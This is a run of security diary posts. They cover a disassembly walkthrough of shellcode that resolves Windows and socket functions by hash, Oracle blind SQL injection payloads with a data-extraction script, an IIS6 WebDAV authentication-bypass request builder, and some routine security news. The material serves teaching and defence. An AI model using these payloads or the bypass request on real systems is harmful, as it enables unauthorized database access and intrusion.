Back to our analogy for a moment, the main application is like you... the person who knows their way around the house.  The running application (i.e. you), knows where everything is, because it was there when the house was "built" (i.e. when the Windows Loader loaded up the application and fixed up the import table).  The malicious code that we're looking at has never been in this particular "house" before, and it doesn't know where anything is... it's stumbling around blindfolded and... well... skinning its knees on the coffee table in the living room as we speak.

In Part 1 of this little excursion, we wrapped things up just when the malcode, after first figuring out its own location (so it could decrypt itself), had figured out where the BaseAddress of kernel32.dll was located.  In our analogy, this is the equivalent of you and your partner figuring out that they're in the living room, and then successfully navigating to the kitchen.  The kitchen (played by the enormously popular kernel32.dll) is where all the really useful tools are located... so now let's see how we're going to find them.

If you'll recall, we had just returned from a subroutine that chained through several in-memory data structures (starting with the Process Environment Block) to find the BaseAddress of kernel32.dll, which is now safely stored in EAX.  Here's what we return to:

0000047C                 mov     [esi], eax
0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E

Also recall that we had created a new chunk o' stack for ourselves and had stored its location in ESI.  When we returned from the previous subroutine, interestingly, the stack wasn't completely cleaned up... normally a very bad programming practice that would cause your program to toss its digital cookies. However, remember that the malware created its own "mini-stack" and will (hopefully!) put things back the way it found them before it's through.  In any case, that first instruction is now shoving a copy of the base address of kernel32.dll into the "lost" stack space while the next instruction pushes a reference to that location onto the top of the stack.  In programming parlance, the "lost" stack locations were used "on the fly" to create some space that our malcode will use like a .bss segment (the .bss segment in a program is a segment which contains uninitialized data... Extra Credit: Anyone know why it's called ".bss"?)

Next, the malcode then pushes a pretty funky number (0xEC0E4E8E) onto the stack and then calls a subroutine.  What the heck is that all about?  Let's take a look at the code for the subroutine (sub_58E) that is being called, and see if we can figure it out:

0000058E ; =============== S U B R O U T I N E ===============
0000058E sub_58E         proc near
0000058E arg_0           = dword ptr  14h
0000058E arg_4           = dword ptr  18h
0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi
00000592                 mov     ebp, [esp+arg_4]
00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp
0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp
000005A7 loc_5A7:
000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld
000005B2 loc_5B2:
000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2
000005C0 ; --------------------------------------
000005C0 loc_5C0:
000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7
000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp
000005CB                 mov     cx, [ebx+ecx*2]
000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp
000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD
000005DB ; --------------------------------------
000005DB                 xor     eax, eax
000005DD loc_5DD:
000005DD                 mov     edx, ebp
000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx
000005E3                 retn    4
000005E3 sub_58E         endp
000005E3 ; --------------------------------------

"Gadzooks!  Now hold on just a darned minute!" I hear you cry. "When I signed up for this trip, you said 'some assembly required' but Tom, this is gettin' ridiculous..."

Tempted as I am to go all "General Patton" on your cowardly ass, I will instead gently reassure you that we'll just take things one step at a time and work our way through this stuff together.  We may even hold hands.  So take a deep breath, let it out slowly-- put on your most comfortable set of shoes, pour yourself a wine spritzer, and we'll begin:

Remember from before, that good programming practice dictates that we save out the values in the registers that we're going to use, before we use them... so that we can put everything back in place when we're done.  That's what these four instructions are doing:

0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi

These match up nicely with four other instructions down near the end of the subroutine:

000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx

Remember, the ones at the end need to pop out the values that we pushed onto the stack in the opposite order... because it's a last-in-first-out (LIFO) stack.  Which, coincidentally, also explains the next instruction:

00000592                 mov     ebp, [esp+arg_4]

Looking up at the top of the subroutine code, we can see that our disassembler has done something a little weird.  It's created some variables for us, called "arg_0" and "arg_4."  You see, the disassembler understands a couple of interesting things about how code is written, and it has taken that into account when it generated the disassembly in order to help us understand a little more about the code we're looking at.

Generally, programs tend to do small chunks of "stuff" over and over again.  Those chunks of "stuff" are organized by programmers into "functions" or "subroutines."  Functions take parameters (for instance, if you wrote a function to add two numbers, the parameters would be the two numbers to be added), and at the assembly language level, those parameters are passed on the stack. (Gosh, but this "stack" thing is useful, isn't it?)  Before we called this particular subroutine, we pushed some values onto the stack... since, at some point, the subroutine apparently uses those values (as we're about to see...) the disassembler then makes sure we understand what's going on by calling the two parameters (or arguments) to our attention, explicitly, at the top of the subroutine's disassembly.  The problem is this: the parameters are buried deep down in the stack... below the return location that gets pushed onto the stack when the subroutine is called, and even below the stuff that we just now pushed onto the stack-- so we're not gonna be able to just pop those suckers off and use 'em.  That's where these special offset variables up at the top of the subroutine come into play.   The disassembler understands what's going on, and does its best to explain it to us by referencing these as "arg_0" and "arg_4" wherever they are used.  Unlike me, sometimes the disassembler will get things wrong... but for the most part (and especially in this case), it knows what it's talking about.

Now, remembering that the arguments are pushed onto a LIFO stack, we know that the deeper in the stack the variable is, the earlier it was pushed on... so "arg_4" corresponds to the BaseAddress of kernel32.dll that was pushed onto the stack with this statement:

0000047E                 push    dword ptr [esi]

So, based on the instruction at 00000592, EBP now contains the BaseAddress of kernel32.dll. Then, we see the following:

00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp

so, EAX is loaded with the value stored at the BaseAddress of kernel32.dll (EBP) plus 60 (0x3C).  EDX is then loaded with whatever is stored at EBP plus EAX plus 120 (0x78), and then the BaseAddress is added to EDX.  Hmmm... let's see if we can figure out what that means.

We've been talking all along about the "BaseAddress" of kernel32.dll like that actually meant something... but what?  Well, when a dynamic link library (DLL) is loaded into the memory space of a program, what happens is that the full-blown .dll file itself is simply mapped directly into memory-- lock, stock, and barrel.  So, when we talk about the "BaseAddress" for the .dll, it is simply the beginning of that memory mapped file.  So, in order to understand what's going on here, we need to take a look at the format of a .dll file-- which is simply another vile and sinister incarnation of the more general "Portable Executable" (PE) file format used for most Windows executables.

Every PE file begins with an ode to the past... an old DOS header that hangs around to keep Windows backwards compatible.  (Yep, you can run Word 2007 in MS-DOS-- don't let anyone tell you differently. It won't really be all that interesting: it'll just tell you that you need to run it under Windows, but don't be fooled: it executed...) Now, deep down inside that old DOS header (called the "MZ" header... 'cause it begins with Mark Zbikowski's initials...) at position 0x3C is a 32-bit value known as "e_lfanew" that tells you the offset from the beginning of the file to the PE header itself.  In other words, that value tells you how many bytes of "backwards compatible" you need to skip to get to the real meat: the PE header. So what we're seeing so far makes sense: EAX is loaded up with the value of "e_lfanew" and added to the BaseAddress (that's then the beginning of the PE header).  Then, EDX is loaded up with a value at 0x78 within the PE header itself.  Let's see what's there...
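You can see the same walk in a few lines of Python over a hand-built buffer (this is a fake header stub, not a real executable; the offsets 0x3C and "PE\0\0" signature are the real PE-format values): read the dword at 0x3C, and it tells you where the PE header lives.

```python
import struct

# A minimal stand-in for the start of a memory-mapped PE image:
# "MZ" magic at offset 0, e_lfanew at offset 0x3C pointing at "PE\0\0".
image = bytearray(0x100)
image[0:2] = b"MZ"
struct.pack_into("<I", image, 0x3C, 0x80)   # e_lfanew = 0x80 (arbitrary here)
image[0x80:0x84] = b"PE\x00\x00"

# The equivalent of "mov eax, [ebp+3Ch]": fetch e_lfanew...
e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
# ...and BaseAddress + e_lfanew is the PE header itself.
pe_sig = bytes(image[e_lfanew:e_lfanew + 4])
```

In the shellcode, EBP plays the role of the start of `image`, and the add instruction performs the `BaseAddress + e_lfanew` step.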

Rolling down through the PE header to offset 0x78, we find that location occupied by a 32-bit value known as the "Export Table RVA."  When dealing with PE files, the idea of an "RVA" or "Relative Virtual Address" is used repeatedly.  Because PE files can't be guaranteed that they'll be loaded at the same memory location every time, most of the references to locations within the file are expressed as offsets from the BaseAddress-- a "Relative Virtual Address" or RVA.  And, in this case, we're seeing exactly why that's useful... it's going to make things a whole lot easier for us, because if we know anything at all, it's the BaseAddress of kernel32.dll.  In fact, in the very next instruction we see that we're updating EDX (by adding kernel32.dll's base address, found in EBP) so that it now points directly to the Export Table.

What the heck is an Export Table?  Well, remember that DLL files are simply libraries of interesting, reusable functions... code to perform exactly the kind of stuff that our malware (and legitimate programs) need to perform over and over.  But, for a DLL to be useful, it needs some way to tell other programs (programs that normally load the DLL at run-time) where, within itself, those interesting functions are found.  The Export Table is a structure that acts sort of like the card-catalog in a library (uh... do libraries actually even have card catalogs anymore, or did I just date myself?), allowing the Windows Loader to know where the functions that the DLL makes available are found, so it can then "fix up" the "Import Table" of the program loading the DLL-- which can then actually use the functions.  The Export Table itself has a specific, known structure, which we'll need to get on speaking terms with, because... well... the next three instructions look like this:

0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp

In this case, we see that we're copying the value found at offset 0x18 in the Export Table into ECX and the value found at offset 0x20 into EBX.  Since this appears to be somewhat important, in a vaguely "it causes the program to work" sorta way, we should probably try to find out what those values represent...

At offset 0x18 in the Export Table structure is a 32-bit value that represents the number of named functions exported by the DLL, and the value at 0x20 is an RVA for the beginning of a list of those names.  After the "add" instruction, EBX contains the full address of that name list.

The next chunk of code:

000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld

starts off by checking the value in ECX: if it is zero, we end up jumping off someplace else that... well... we'll worry about later-- otherwise, the value in ECX is decremented by one.  Right off the bat, this gives us an idea of what is going on here: remember that ECX contained a count of the number of named functions that are exported by kernel32.dll... and so to me, it looks like we're going to step through each of those names looking for something... like some sort of modern-day, silicon-based Diogenes.

Because the names of the functions exported by kernel32.dll aren't all the same length, rather than store the names one after the other, which would require some fancy bookkeeping to keep track of name length, the list of function names is actually a list of RVA values that point to the beginning of each name.  The names themselves are terminated by a "zero," so keeping track of length is unnecessary.  Each RVA is four bytes long, and so this instruction:

000005AA                 mov     esi, [ebx+ecx*4]

is simply a way of calculating the location of the last RVA in the list and putting the result into ESI.  As we decrease the value of ECX, we'll move "down" through the list until ECX hits zero, where, it appears, the loop will terminate.  The next two instructions clear out the value of EDI (remember how XOR works?) and then clear the "Direction" flag so that when the next chunk o' code begins rolling over the function name, it's for certain going to be moving in the correct direction. (Don't worry about it... just trust me, it's necessary.)
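The name-list layout is easy to model in a few lines of Python (toy names and offsets, not real export data): a blob of zero-terminated names, plus a list of offsets pointing at the start of each one.

```python
# Toy model: the names sit back-to-back, each ending in a zero byte,
# and a separate array of offsets (the RVA list) points at each start.
names_blob = b"CloseHandle\x00CreateProcessA\x00LoadLibraryA\x00"
name_rvas = [0, 12, 27]   # offsets of each name within the blob

def name_at(i: int) -> str:
    """Follow RVA i to its name, reading up to the zero terminator."""
    start = name_rvas[i]
    end = names_blob.index(b"\x00", start)
    return names_blob[start:end].decode("ascii")
```

This is exactly why `mov esi, [ebx+ecx*4]` multiplies by 4: each entry in the RVA list is a 4-byte offset, and the variable-length names live elsewhere.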

Now if that little excursion into the world of faith wasn't enough for you, the next few instructions will require you to take my word on even more stuff... 'cause explainin' how we get from one to the other would take us WAAAAY beyond the friendly confines of this little essay.  (I would never lie to you... about anything really, really important....) So, trust me... this stuff here:

000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2

is actually the assembly language equivalent of the C function:

unsigned long hash(char *function_name)
{
    unsigned long hash = 0;
    while (*function_name != 0) {
        hash = (hash << (32 - 0x0D)) | (hash >> 0x0D);
        hash += (unsigned char)*function_name++;
    }
    return hash;
}

This function takes a function name (or really, any string) and then creates a hash value for that name.  "Wow," I hear you say, "it makes a hash value!  That's soooo cool... But what is a hash value?"  A hash value is the result of a function that simply takes a large chunk o' "source" data, and creates a sort of "digital fingerprint"-- a much shorter "hash" value that in some weird mathematical way "represents" the source.  Now, because we're representing a large value using a much smaller one, more than one "source" can end up with the same hash (something called a "hash collision"), but for the purposes here, this is a quick and dirty way for our malware to find the function it wants to use, without ever having to actually have the name of the function stuffed somewhere in its code.  Why is that important?  Well, first of all, it makes reverse engineering these things all that much more difficult, but it also makes it harder for an IDS to catch the code as it flies by.
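If you'd like to check the math yourself, here's the same rotate-right-13-and-add hash in a few lines of Python (a sketch mirroring the disassembly, not code taken from the malware). Feed it "LoadLibraryA" and out pops the magic number:

```python
def ror13_hash(name: bytes) -> int:
    """Rotate-right-13-and-add hash, as in the loop at loc_5B2."""
    h = 0
    for byte in name:
        h = ((h >> 0x0D) | (h << (32 - 0x0D))) & 0xFFFFFFFF  # ror edi, 0Dh
        h = (h + byte) & 0xFFFFFFFF                          # add edi, eax
    return h

value = ror13_hash(b"LoadLibraryA")
print(hex(value))   # 0xec0e4e8e
```

The `& 0xFFFFFFFF` masks simulate the 32-bit register that EDI provides for free.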

Next, we see the following code:

000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7

This portion of the code begins by comparing the hash value that we just created against that funky number that was pushed onto the stack as a parameter for this function... remember... 0xEC0E4E8E...  If it doesn't match, we jump back up to the beginning of our loop, check to see if ECX is zero, decrement it, and check the next name-- lather, rinse, repeat.  If it does match, then we load up EBX with the value found at offset 0x24 of the Export Table (the address of which is still in EDX):

000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp

Offset 0x24 of the Export Table contains the RVA of the beginning of the OrdinalName list.  The "ordinal" of a function is simply its number (1, 2, 3, 4...) within the list of all functions exported by the DLL.  Every exported function has an ordinal-- but every function may not have a name-- some are only ever known by their ordinal. (Why? Because you can make your DLL smaller by forgoing names and using ordinals only... <sarcasm> and we all know that the Oompah Loompahs out in Redmond really care about bloat </sarcasm>... hell, they set the default file alignment on their linker to 4096 and routinely statically link the MSVC runtime in every executable... So, of course, they're gonna want to have a way to save a few bytes by jettisoning the damn function names... But, I digress...) Because of this, the actual location of the code must always be accessed through the ordinal list. The OrdinalName list contains the ordinal for each named exported function, in the same order that the names appear.  So... if you know where you are in the list o' names, you can simply look up the correct ordinal...  In the code above, we first load EBX with the OrdinalName list's RVA, and then add the BaseAddress of kernel32.dll to it.

000005CB                 mov     cx, [ebx+ecx*2]

Ordinals are only 2 bytes long, and since ECX contains the current "position" where we found our name on the name list, it's pretty straightforward to use that same number to get us our ordinal off of the OrdinalName list... which we conveniently load right back into ECX.

000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp

The FunctionAddress list itself is found at offset 0x1C in the Export Table.  For each exported function, the FunctionAddress list contains the RVA of the actual function's code... listed in ordinal order.  So we load the RVA of the beginning of the FunctionAddress list into EBX and add kernel32.dll's BaseAddress (in EBP).

000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD

At this point, ECX contains our ordinal, and each of the addresses in the FunctionAddress list is 4 bytes long... so the instructions above load the RVA of the function we're looking for into EAX and then add the BaseAddress of kernel32.dll.  We then jump to some code that cleans everything up and returns from our subroutine with the information we're looking for tucked away inside EAX.  If something goes south (i.e. we get through the whole list without finding a matching hash) then the subroutine will return with EAX zeroed out.
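To recap the whole name → ordinal → address dance, here's a toy model in Python (plain lists standing in for the real export-table arrays; every name, ordinal, address, and the BASE value below are made up for illustration):

```python
# Three parallel "arrays", as in a real export table:
names     = ["CloseHandle", "CreateProcessA", "LoadLibraryA"]  # name list
name_ords = [7, 99, 580]            # OrdinalName list (2 bytes each in a PE)
func_rvas = {7: 0x1A2B0, 99: 0x3C4D0, 580: 0x5E6F0}  # FunctionAddress list

BASE = 0x7C800000                   # pretend BaseAddress of kernel32.dll

idx     = names.index("LoadLibraryA")   # what the hash loop leaves in ECX
ordinal = name_ords[idx]                # mov cx, [ebx+ecx*2]
rva     = func_rvas[ordinal]            # mov eax, [ebx+ecx*4]
address = BASE + rva                    # add eax, ebp
```

Same position in the name list, same position in the ordinal list; the ordinal then selects the entry in the address list. That's the whole trick.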

So, what function was represented by the magic hash value we passed in?  Here's a list of some of the hash values for kernel32.dll functions and also some additional code that shows some other functions being located:

Function Name             Hash
LoadLibraryA              0xEC0E4E8E
CreateProcessA            0x16B3FE72
ExitThread                0x60E0CEEF

0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E
0000048A                 mov     [esi+4], eax
0000048D                 push    dword ptr [esi]
0000048F                 push    16B3FE72h
00000494                 call    sub_58E
00000499                 mov     [esi+8], eax
0000049C                 push    dword ptr [esi]
0000049E                 push    60E0CEEFh
000004A3                 call    sub_58E
000004A8                 mov     [esi+0Ch], eax

Note that when each of the calls to the sub_58E subroutine returns, the stack is, again, "messed up".  This is done on purpose to continue to open up more pseudo-bss space in which the malware stores the location of a specific kernel32.dll function.  Since ESI marks the beginning of the original "stack," it is used as the reference point for accessing the addresses of the functions.  At ESI+0x04 is the address of LoadLibraryA, at ESI+0x08 is the address of CreateProcessA, and at ESI+0x0C is the address of ExitThread.

Next, the malware puts one of these newly acquired functions to use:

000004AB                 push    3233h
000004B0                 push    5F327377h
000004B5                 push    esp
000004B6                 call    dword ptr [esi+4]
000004B9                 mov     [esi+10h], eax

All of that pushin' at the beginning of this section is actually shoving the name "ws2_32" onto the stack itself (Go and look at an ASCII chart... and remember stuff is backwards).  That final push of ESP pushes a pointer to the string sitting on the stack (ESP is a register that contains a pointer to the top of the stack... since our string is sitting on the stack-- we just pushed it on there-- ESP acts to point at the string).  Finally, the malware again uses the fact that the stack is "messed up" to provide a storage location for the BaseAddress of ws2_32.dll at ESI+0x10 when we get back from the kernel32.dll code.
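You can verify the "backwards" string trick with a quick bit of Python: pack the two pushed immediates in little-endian order (the second push lands at the lower address, i.e. first in memory) and the bytes spell out the DLL name.

```python
import struct

# push 5F327377h ends up at the lower address (the start of the string);
# push 3233h sits just above it, its high bytes doubling as the terminator.
stack_bytes = struct.pack("<I", 0x5F327377) + struct.pack("<I", 0x3233)
name = stack_bytes.rstrip(b"\x00").decode("ascii")
print(name)   # ws2_32
```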

000004BC                 push    dword ptr [esi+10h]
000004BF                 push    0ADF509D9h
000004C4                 call    sub_58E
000004C9                 mov     [esi+14h], eax
000004CC                 push    dword ptr [esi+10h]
000004CF                 push    60AAF9ECh
000004D4                 call    sub_58E
000004D9                 mov     [esi+18h], eax
000004DC                 push    dword ptr [esi+10h]
000004DF                 push    79C679E7h
000004E4                 call    sub_58E
000004E9                 mov     [esi+1Ch], eax
000004EC                 push    dword ptr [esi+10h]
000004EF                 push    3BFCEDCBh
000004F4                 call    sub_58E
000004F9                 mov     [esi+20h], eax

Now, using the BaseAddress of the ws2_32.dll, the malware looks for hashes matching the following:

WSASocketA            0xADF509D9        (esi+0x14)
connect               0x60AAF9EC        (esi+0x18)
closesocket           0x79C679E7        (esi+0x1C)
WSAStartup            0x3BFCEDCB        (esi+0x20)

And stores each of them at the offsets from ESI listed above...

Ok... so, boys and girls, how was that for a wild ride?  Does your brain hurt yet?  Man, oh man... mine does! 

Well, we made it to the "kitchen," and we figured out how to find all of the tools necessary for our malware to make a sammich... In the next installment, we'll take a look at how that sammich gets made and what it actually does.

Tom Liston - InGuardians, Inc.
Handler On Duty
Chairman - SANS WhatWorks in Virtualization and Cloud Computing Security Summit
Follow me on Twitter


Published: 2009-05-19

Advanced blind SQL injection (with Oracle examples)

Quite often developers ask me if they should put controls on every single parameter that they receive from users of their web application. My answer is, of course, yes. A couple of weeks ago I worked on a penetration test where we exploited a blind SQL injection vulnerability in a web application that used Oracle as the backend database.

The vulnerability was not easy to exploit due to extensive use of stored procedures, but with some clever SQL hacking I managed to retrieve everything from the database. Since I haven't seen a lot of papers about this, I thought it would be a good idea to write a diary about it, so here we go.


First, we will define our test environment so you can see how to exploit it. In our test environment, the application receives one parameter. We'll call it event, and it can have two possible values, true or false, passed in the query string (event=true or event=false).


Now let's see how this can be exploited through some advanced SQL injection.

The simplest test is to enter a ' character in the parameter (event=true'). As we are dealing with SQL injection, this will cause the SQL statement to be invalid, in which case the application will just print a message that a database error occurred (no SQL visible).

However, depending on the parameter (true, false, or something else), the application will have different output, and that allows us to see what's going on behind the scenes. In other words, if the parameter is "true" the output will be different from the case when the parameter is "abcd" (or "false"). And this is the basis of blind SQL injection – we want to distinguish between the results of various SQL statements, which will allow us to deduce the content of the database.

In typical blind SQL injection examples a timed delay is added and the attacker observes how long the query takes to execute. In this case that was not possible because I was dealing with stored procedures and some web application firewalls which prevented me from using UNION statements. But that doesn't mean it's game over.


As we don't know exactly how the stored procedure is called, the easiest way to determine whether the database evaluates our input is to split the input parameter:

event = tr' || 'ue

This will cause the final input parameter to be 'tr' || 'ue' – the || operator is Oracle's string concatenation operator, so the parameter will actually evaluate to "true".

This shows that the database is evaluating the SQL statement which allows us to enter some if/then cases that will, in the end, allow us to read data from the database. So let's see how this is done in a bit more complex query:

event = tr' || (select case when substr(banner, 1, 1) = 'A' then 'u' else 'X' end from (select banner from v$version where banner like '%Oracle%')) || 'e

While this maybe looks complex, it really isn't. The query takes the database banner from v$version (where it has string Oracle in it). Then, from that line the first character is examined (specified by the substr() call) and compared to the letter 'A'.
If it is 'A', the query returns 'u', otherwise it returns 'X'.

Finally, this is concatenated so we have the following if/then case:
- If first character of the banner line containing string Oracle is 'A' return 'u' so the final string will be 'true'.
- Otherwise, return 'X' so the final string will be 'trXe'.

Now, by examining the output of the application, I was able to deduce whether the query was successful or not. A couple of minutes later I had a perl script that traverses all character positions, and I was able to retrieve data from the database.
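For readers who want to experiment, the character-walking logic that such a script implements can be sketched in a few lines of Python. This is an illustrative sketch, not the original perl script: in a real test the oracle() callback would issue the HTTP request and check whether the application rendered its "true" page.

```python
import string

def build_payload(pos, ch):
    # The Oracle CASE payload from the diary: the injected parameter
    # evaluates to "true" iff the pos-th banner character equals ch,
    # and to "trXe" otherwise.
    return (
        "tr' || (select case when substr(banner,{0},1) = '{1}' "
        "then 'u' else 'X' end from "
        "(select banner from v$version where banner like '%Oracle%')) || 'e"
    ).format(pos, ch)

def extract(oracle, alphabet=string.ascii_letters + string.digits + " .-()",
            max_len=64):
    # oracle(payload) -> True when the application shows its "true" page.
    result = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if oracle(build_payload(pos, ch)):
                result += ch
                break
        else:
            break  # no candidate matched: assume end of string
    return result
```

The same loop works for any query that can be folded into a CASE expression, which is why the technique generalizes from the version banner to arbitrary tables.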

Lessons learned

How serious is this? Well, it's pretty serious, depending on what is in the database. While I wasn't able to modify the data, I was able to retrieve everything from the database. Remember Oracle? It has a handy view called all_source which contains the source of stored procedures and functions. This even allowed me to retrieve source code!
This example shows why every parameter your application deals with must be verified. In this simple case, all the developer had to do was check the parameter against a simple whitelist of true and false. Developers should also be aware that they can't rely on stored procedures alone, hoping that they will do the job for them, as it all depends on the environment.
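The whitelist check the diary recommends is tiny. A minimal sketch (the function name and the choice to raise an exception are assumptions for illustration):

```python
# Only these two values are legal for the "event" parameter.
ALLOWED_EVENT_VALUES = {"true", "false"}

def validate_event(value):
    # Reject anything that is not literally "true" or "false" before
    # it gets anywhere near a SQL statement.
    if value not in ALLOWED_EVENT_VALUES:
        raise ValueError("invalid event parameter")
    return value
```

Note that this is a whitelist (accept known-good), not a blacklist of dangerous characters; the payloads above contain nothing more exotic than quotes and pipes, and blacklists are routinely bypassed.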




Published: 2009-05-19

New Version of Mandiant Highlighter

In the past I have waxed enthusiastic about Mandiant's Highlighter log parsing tool.  It is simply an amazing time saver for anyone who needs to parse fixed-format log files such as firewall logs.  The biggest limitation of the early versions of Highlighter was that it could not handle large files.  Not anymore: as of the recently released version 1.1.1, Highlighter has large-file support and a number of other new features.

Highlighter can be downloaded for free from the software section of Mandiant's website.

 More information on this release can be found at the Mandiant Blog.

-- Rick Wanner -  rwanner at isc dot sans dot org


Published: 2009-05-18

JSRedir-R/Gumblar badness

Reader Ben sent an email reminding me that I must have been living under a rock to miss the sudden uptick in Gumblar/JSRedir-R drive-bys.

Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar.  According to Sophos this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival.

Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials.

 More information is available at Sophos and the Unmask Parasites blog.


Update: Holger informed the ISC that the dropbox for this trojan, gumblar.cn, has been offline since last Friday, but a successor, martuz.cn, has come online.

-- Rick Wanner -  rwanner at isc dot sans dot org


Published: 2009-05-18

Cisco SAFE Security Reference Guide Updated

A number of years ago I found myself in a new role, responsible for consulting on the security of a VoIP platform.  Having never been responsible for VoIP security, I went looking for Internet sources I could use as a reference.  What I discovered was the Cisco SAFE security guides.  Although the SAFE VoIP security guide is long gone, the Cisco SAFE Security Reference Guide has recently been updated.  The Reference Guide is the omnibus document containing design standards for all aspects of network security.  Although Cisco-centric, the Guide is very complete and can be adapted to whatever technologies you choose to deploy in your networks.  In addition to the Reference Guide, the SAFE home page contains other papers which may be of use in interpreting SAFE.

-- Rick Wanner rwanner at isc dot sans dot org


Published: 2009-05-15

IIS6.0 WebDav Remote Auth Bypass

If you're in the security business long enough, this one will sound extremely familiar:  Apparently, adding certain Unicode characters to a URL makes it possible to bypass authentication in Microsoft IIS6 with WebDAV and access, or even upload, files in folders which are supposed to be password protected.

The description was posted to Full Disclosure earlier, and there's a brief comment/analysis on Thierry Zoller's blog.

Yup, we hate to spring such surprises on you on a Friday evening.  If you have WebDAV active and accessible from the Internet on any of your IIS6 servers, it is probably a wise move to hedge your bets and turn WebDAV off over the weekend, until more details on this problem become available.
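For illustration only, here is how such a request could be assembled, based on the public posting's reported use of an overlong UTF-8 encoding of '/' (%c0%af) in the path. The host, the path, and the exact header set are assumptions made up for this sketch, and nothing is sent:

```python
# Illustrative only: assembles (but does not send) a request of the
# kind described in the Full Disclosure posting. Host and path are
# made up; use only against systems you are authorized to test.
def unicode_bypass_request(host, protected_path):
    # %c0%af is an overlong UTF-8 encoding of '/'; the posting reports
    # that IIS6's access check and its file lookup treat it differently,
    # which is what bypasses the password protection on the folder.
    evil_path = "/..%c0%af" + protected_path.lstrip("/")
    return (
        "GET {0} HTTP/1.1\r\n"
        "Host: {1}\r\n"
        "Translate: f\r\n"      # reportedly routes handling via WebDAV
        "Connection: close\r\n"
        "\r\n"
    ).format(evil_path, host)
```

If your IDS can alert on %c0%af (or other overlong encodings) in inbound URLs, that is a reasonable stopgap detection while you wait for a patch.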



Published: 2009-05-15

Warranty void if seal shredded?

Fellow ISC handler Patrick Nolan commented earlier on the changes to HIPAA requirements that the recent HITECH act brings to hospitals and health care providers in the U.S. The portion that I want to dive into with a bit more detail is

"Electronic media [must be] cleared, purged, or destroyed consistent with NIST Special Publication 800-88, Guidelines for Media Sanitization such that [sensitive information cannot] be retrieved."

NIST 800-88  is pretty succinct and explicit in its demands on how media and harddisks are to be purged or destroyed. "Purging" refers to making the contents unreadable by "degaussing" the disk or using the "secure erase" command in the drive's firmware. "Destroying" in the words of NIST includes "Disintegration, Pulverization, Melting, and Incineration".

So far, so good. But there's a catch. Let's assume that you have a hard drive which contains sensitive data. It doesn't really matter if you are a bank or a hospital or a cutting-edge research shop: The data on the disk is vital. And the disk just snuffs it one day and refuses to spin. Let's further assume that - not uncommon for servers - the disk is still under warranty, and if you ship it back to your vendor, you'll get it replaced for free.

Now what? According to NIST 800-88, a disk with sensitive content which leaves your organization's control has to be destroyed. I strongly suspect though that shipping a baggie of metal confetti back to your vendor could slightly impair your warranty rights. Shipping the disk as-is, on the other hand, exposes your data to all sorts of nightmares, not the least of which being your vendor getting it back to spin and reselling it on eBay as "used, in working condition".

How do you deal with this problem? Do you shred all the disks that leave your shop, forgoing the warranty? Do you degauss the disks before returning, hoping that the degausser actually does its job and the vendor's check doesn't mind? Did you carefully vet your vendor's media handling and have full traceability for all disks returned? Or do you simply take the plunge and hope that your old disk vanishes in the sea of disks offered for resale?

Please let us know by participating in the poll to the right!



Published: 2009-05-14

Twitter for the Internet Storm Center

Even if you don't use Twitter, or couldn't care less about it, you might want to read this post.

In light of what happened this morning, when we had hundreds of tweets going out during a major outage event (Google being down), we don't want to force people who are following the http://twitter.com/sans_isc account to be subjected to news they don't care about.

Therefore, the sans_isc account will only be used for headlines and major announcements (so feel free to have this account go to your cell phone via SMS if you wish).  For rapid-fire exchanges like what happened this morning, or for breaking news situations such as a new worm or virus, we've established a less formal account that we can tweet from very quickly.

This account will not be used as often, but when it is, it will be something you'll want to pay attention to.  The account is:


As the name implies, this account is for the rapid-fire dissemination of news and information.  We are going to keep duplicate information between the two accounts to a minimum, and when we need to post something on the @sans_isc_fast account, we will call attention to it via the @sans_isc account.

We've put this on the official SANS handler Twitter list:


Thank you!

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler


Published: 2009-05-14

Possible Gmail outage

I am affected as well.  :)

We've received several reports in the past hour about Gmail being down.  Don't have a timeframe on how long it will be down, but it looks like Gmail has been unresponsive for about the past 10 minutes.  I'll update this diary if it continues.

